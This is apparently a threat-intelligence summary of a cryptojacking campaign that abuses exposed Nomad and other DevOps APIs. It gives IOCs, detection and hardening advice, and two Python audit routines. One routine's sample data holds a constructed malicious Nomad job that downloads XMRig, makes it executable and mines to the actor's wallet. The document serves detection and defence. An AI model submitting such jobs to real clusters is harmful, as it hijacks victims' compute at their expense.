Full Report
The Wiz Threat Research team has identified a widespread cryptojacking campaign targeting commonly used DevOps applications including Nomad and Consul.
Analysis Summary
# Tool/Technique: XMRig Miner Deployment (JINX-0132 Campaign)
## Overview
This summary covers the tactics, techniques, and procedures (TTPs) of JINX-0132, a threat actor conducting a widespread cryptojacking campaign. The actor exploits existing misconfigurations in publicly accessible DevOps applications, specifically Nomad, Consul, Docker, and Gitea, to deploy XMRig, a legitimate open-source Monero miner. The campaign is notable as the first publicly documented exploitation of Nomad misconfigurations as an attack vector.
## Technical Details
- Type: Malware (Legitimate tool used maliciously) / Technique (Misconfiguration Abuse)
- Platform: Linux/UNIX-like environments hosting exposed DevOps services (Nomad, Consul, Docker, Gitea).
- Capabilities: Monero mining via XMRig; relies entirely on publicly available open-source tooling and public download locations (Living Off Open Source).
- First Seen: Not explicitly stated, but recently documented by Wiz Threat Research.
## MITRE ATT&CK Mapping
The campaign gains execution by abusing exposed DevOps APIs and evades signature-based detection by using unmodified legitimate tooling rather than custom malware. The mapping below is inferred from the behaviours described in this summary.
- **TA0001 - Initial Access**
- **T1190 - Exploit Public-Facing Application** (Submitting jobs to an internet-exposed Nomad API with ACLs disabled. The weakness is a misconfiguration, not a software vulnerability, but the effect is the same: unauthenticated code execution on the cluster.)
- **TA0002 - Execution**
- **T1059.004 - Command and Scripting Interpreter: Unix Shell** (Task commands that unpack the archive, `chmod +x` the binary and launch it.)
- **TA0011 - Command and Control**
- **T1105 - Ingress Tool Transfer** (Fetching the official XMRig release from its public GitHub repository.)
- **TA0005 - Defense Evasion**
- **T1036.005 - Masquerading: Match Legitimate Name or Location** (Using unmodified official XMRig releases; the binary is only malicious by use, not by signature.)
- **TA0040 - Impact**
- **T1496 - Resource Hijacking** (Mining Monero on compromised compute.)
*(Note: Mapping is based on inferred actions from the description; it has not been confirmed against the full report.)*
## Functionality
### Core Capabilities
- **Initial Access/Execution:** Abusing HashiCorp Nomad's default configuration, in which ACLs are disabled, so that anyone who can reach the HTTP API can register and run jobs. On an internet-exposed cluster this is effectively Remote Code Execution (RCE) on every client node that schedules the job.
- **Payload Acquisition:** Downloading the most recent official XMRig release directly from its public GitHub repository.
- **Execution/Persistence:** Unpacking the archive, marking the miner executable (`chmod +x`) and running it. No separate persistence mechanism is needed: the job stays registered in the scheduler and Nomad restarts the task according to the job's restart policy.
### Advanced Features
- **Living Off Open Source:** Deliberate avoidance of unique, custom C2 infrastructure or custom malware, relying solely on public tools (XMRig) and public repositories for payload acquisition, making clustering difficult.
- **Resource Hijacking:** Targeting high-compute instances (some providing tens of thousands of dollars' worth of CPU/RAM resources monthly) to maximize hashrate at the victim's expense.
- **Task Definition:** Using a consistent Nomad task group name (`NIGNOG`) within the deployed malicious jobs.
## Indicators of Compromise
The threat actor actively avoided hard IOCs, making detection challenging.
- File Hashes: `ea7c97294f415dc8713ac8c280b3123da62f6e56` (SHA-1 of a public XMRig release. It matches that release wherever it is deployed, so it identifies the tool, not the actor.)
- File Names: Not explicitly listed; the official release archives unpack to a binary named `xmrig`.
- Registry Keys: N/A (Likely Linux-based environments).
- Network Indicators:
- Monero Pool: `pool[.]supportxmr[.]com` (A public pool; coarse on its own, since legitimate miners use it too.)
- Wallet Address: `468VEByGGFQSN2bJG99ovhe5SG9SLxLAA9e2s7tWFxvBM33FAEP4JbwYHEeXexq8djYpDEHg9Jq6eGF3rREnAAc4UkjLd3E` (Actor-specific; the strongest indicator available, visible in the miner command line and its outbound pool login.)
- Behavioral Indicators:
- Creation of new Nomad jobs with the task group name `NIGNOG`.
## Associated Threat Actors
- JINX-0132
## Detection Methods
- Signature-based detection: Limited, as official XMRig releases are used. File hash monitoring is brittle: the hash changes with every upstream release and matches legitimate installs of the same release.
- Behavioral detection: Monitoring for the creation of new, unexpected Nomad jobs, especially those whose task definitions download binaries from external sources and then change file permissions (e.g., `chmod +x`) before executing them. Workload sensors that flag crypto-miner processes (sustained CPU saturation, connections to known pool endpoints) are effective regardless of which miner build is used.
- YARA rules: Not explicitly mentioned. A rule on the binary itself would fire on every XMRig install; a rule keyed on the wallet address above, applied to process memory, dropped config files or command lines, is specific to this actor.
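The behavioral checks above, turned into a triage routine for Nomad job documents. This is an added example, not code from Wiz or from the report; the two job documents are constructed samples in the shape Nomad's HTTP API returns for a job (the field names `TaskGroups`, `Tasks`, `Driver`, `Artifacts`, `GetterSource`, `Config`), the release version in the artifact URL is a placeholder, and the thresholds and message text are my own choices. It flags the campaign's group name, a GitHub XMRig artifact, a `chmod +x` in the task command, the pool and the wallet, plus use of the `raw_exec` driver, which runs tasks on the host without isolation and is disabled in Nomad by default.

```python
import json
import re

# Constructed sample jobs (not real captures) in the shape Nomad's HTTP API
# returns for GET /v1/job/<id>. The first mirrors the campaign described
# above; the release version in the URL is a placeholder. The second is an
# ordinary web service job used as a negative control.
SUSPICIOUS_JOB = json.dumps({"Job": {
    "ID": "cleanup-task", "Type": "batch",
    "TaskGroups": [{"Name": "NIGNOG", "Tasks": [{
        "Name": "run", "Driver": "raw_exec",
        "Artifacts": [{
            "GetterSource": "https://github.com/xmrig/xmrig/releases/download/"
                            "vX.Y.Z/xmrig-X.Y.Z-linux-static-x64.tar.gz",
            "RelativeDest": "local/"}],
        "Config": {"command": "/bin/sh", "args": ["-c",
            "tar xzf local/xmrig-*.tar.gz -C local && "
            "chmod +x local/xmrig-*/xmrig && "
            "local/xmrig-*/xmrig -o pool.supportxmr.com:443 -u "
            "468VEByGGFQSN2bJG99ovhe5SG9SLxLAA9e2s7tWFxvBM33FAEP4JbwYHEeXexq8djYpDEHg9Jq6eGF3rREnAAc4UkjLd3E"]},
    }]}],
}})

BENIGN_JOB = json.dumps({"Job": {
    "ID": "web", "Type": "service",
    "TaskGroups": [{"Name": "frontend", "Tasks": [{
        "Name": "nginx", "Driver": "docker",
        "Config": {"image": "nginx:1.27", "ports": ["http"]},
    }]}],
}})

# Indicators taken from this summary, plus two behavioural patterns.
CAMPAIGN_GROUP_NAMES = {"NIGNOG"}
CAMPAIGN_WALLET = ("468VEByGGFQSN2bJG99ovhe5SG9SLxLAA9e2s7tWFxvBM33FAEP4JbwYHEeXexq8"
                   "djYpDEHg9Jq6eGF3rREnAAc4UkjLd3E")
MINING_POOLS = {"pool.supportxmr.com"}  # public pool: coarse on its own
MINER_RELEASE_URL = re.compile(r"github\.com/xmrig/xmrig/releases", re.I)
CHMOD_EXEC = re.compile(r"\bchmod\s+(\+x|[0-7]{3,4})\b")


def _task_cmdline(task: dict) -> str:
    """Flatten a task's driver config (command + args) into one string."""
    cfg = task.get("Config") or {}
    parts = [str(cfg.get("command", ""))] + [str(a) for a in cfg.get("args") or []]
    return " ".join(parts)


def triage_job(job_json: str) -> list:
    """Return human-readable findings for one Nomad job document."""
    job = json.loads(job_json)["Job"]
    findings = []
    for group in job.get("TaskGroups") or []:
        if group.get("Name") in CAMPAIGN_GROUP_NAMES:
            findings.append(f"task group name matches campaign indicator: {group['Name']}")
        for task in group.get("Tasks") or []:
            name = task.get("Name")
            # raw_exec runs on the host with no isolation and is off by default;
            # an unexpected job asking for it deserves a look on its own.
            if task.get("Driver") == "raw_exec":
                findings.append(f"task {name} uses the raw_exec driver")
            for artifact in task.get("Artifacts") or []:
                if MINER_RELEASE_URL.search(artifact.get("GetterSource", "")):
                    findings.append(f"task {name} fetches an XMRig release from GitHub")
            cmdline = _task_cmdline(task)
            if CHMOD_EXEC.search(cmdline):
                findings.append(f"task {name} marks a file executable before running it")
            if CAMPAIGN_WALLET in cmdline:
                findings.append(f"task {name} passes the JINX-0132 wallet address")
            elif any(pool in cmdline for pool in MINING_POOLS):
                findings.append(f"task {name} connects to a known mining pool")
    return findings


if __name__ == "__main__":
    for label, doc in (("suspicious", SUSPICIOUS_JOB), ("benign", BENIGN_JOB)):
        print(label, triage_job(doc) or "no findings")
```

In practice the input would come from the cluster's job API or event stream rather than an embedded string; the wallet and group-name checks are the actor-specific part, while the artifact, `chmod` and `raw_exec` checks will keep working when the actor rotates those identifiers.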
## Mitigation Strategies
- **Prevention:** Immediately audit and secure all exposed DevOps tooling APIs (Nomad, Consul, Docker API, Gitea).
- **Hardening Recommendations:**
- For **Nomad**: Enforce the security configuration recommended by HashiCorp documentation so that unauthorized users cannot submit arbitrary jobs. Concretely: enable ACLs (they are disabled by default), enable TLS on the HTTP and RPC listeners, bind the API to a private interface rather than `0.0.0.0`, and do not enable the `raw_exec` driver on clients unless a workload genuinely requires unsandboxed host execution.
- For all exposed services: Ensure public exposure is strictly limited, preferably utilizing VPNs or private networks for management interfaces.
- **General Posture:** Apply principle of least privilege to all users accessing configuration APIs.
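A small audit of a Nomad agent configuration against the hardening points above. This is an added example, not code from Wiz or from HashiCorp; the two configurations are constructed in Nomad's JSON agent-config format (the same `acl`, `tls`, `bind_addr`, `addresses` and `plugin` keys as the HCL form), the file paths are placeholders, and the defaults assumed for missing keys (ACLs off, TLS off, `bind_addr` 0.0.0.0, `raw_exec` disabled) are Nomad's documented defaults.

```python
import json

# Constructed Nomad agent configurations in JSON config format (not from a
# real deployment). WEAK reflects the out-of-the-box defaults that this
# campaign relies on; HARDENED is the corrected counterpart. Paths are
# placeholders.
WEAK_AGENT_CONFIG = json.dumps({
    "datacenter": "dc1",
    "bind_addr": "0.0.0.0",
    "server": {"enabled": True, "bootstrap_expect": 1},
    "client": {"enabled": True},
    "plugin": {"raw_exec": {"config": {"enabled": True}}},
})

HARDENED_AGENT_CONFIG = json.dumps({
    "datacenter": "dc1",
    "bind_addr": "10.0.1.10",
    "server": {"enabled": True, "bootstrap_expect": 1},
    "client": {"enabled": True},
    "acl": {"enabled": True},
    "tls": {
        "http": True,
        "rpc": True,
        "ca_file": "/etc/nomad.d/ca.pem",
        "cert_file": "/etc/nomad.d/server.pem",
        "key_file": "/etc/nomad.d/server-key.pem",
        "verify_server_hostname": True,
        "verify_https_client": True,
    },
})

WILDCARD_BINDS = {"0.0.0.0", "::", "[::]"}


def audit_agent_config(config_json: str) -> list:
    """Return the settings that leave the job API open to the abuse described above.

    Missing keys are evaluated at Nomad's defaults: ACLs off, TLS off,
    bind_addr 0.0.0.0, raw_exec disabled.
    """
    cfg = json.loads(config_json)
    findings = []

    acl = cfg.get("acl") or {}
    if not acl.get("enabled", False):
        findings.append("acl.enabled is false: any caller reaching the HTTP API can submit jobs")

    tls = cfg.get("tls") or {}
    if not tls.get("http", False):
        findings.append("tls.http is false: API traffic, including any tokens, is plaintext")
    if not tls.get("rpc", False):
        findings.append("tls.rpc is false: server/client RPC is plaintext and not mutually authenticated")

    # addresses.http overrides bind_addr for the HTTP listener when present.
    http_addr = (cfg.get("addresses") or {}).get("http") or cfg.get("bind_addr", "0.0.0.0")
    if http_addr in WILDCARD_BINDS:
        findings.append(f"HTTP API listens on {http_addr}: reachable from every interface")

    raw_exec = ((cfg.get("plugin") or {}).get("raw_exec") or {}).get("config") or {}
    if raw_exec.get("enabled", False):
        findings.append("raw_exec driver enabled: tasks run unsandboxed as the Nomad client's user")

    return findings


if __name__ == "__main__":
    for label, doc in (("weak", WEAK_AGENT_CONFIG), ("hardened", HARDENED_AGENT_CONFIG)):
        print(label, audit_agent_config(doc) or "no findings")
```

Enabling ACLs alone closes the job-submission path this campaign uses; the TLS and bind-address checks matter because an ACL token sent over plaintext to a listener on every interface can be recovered and reused, and the `raw_exec` check limits the blast radius if a job is submitted anyway.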
## Related Tools/Techniques
- SeleniumGreed (a previous cryptomining campaign targeting exposed Selenium Grid deployments).
- Other cryptojacking malware families that rely on hijacking compute resources (e.g., Kinsing, 8220).
- Exploitation of default configurations in other orchestration layers (e.g., exposed Kubernetes dashboards or unsecured cloud metadata services).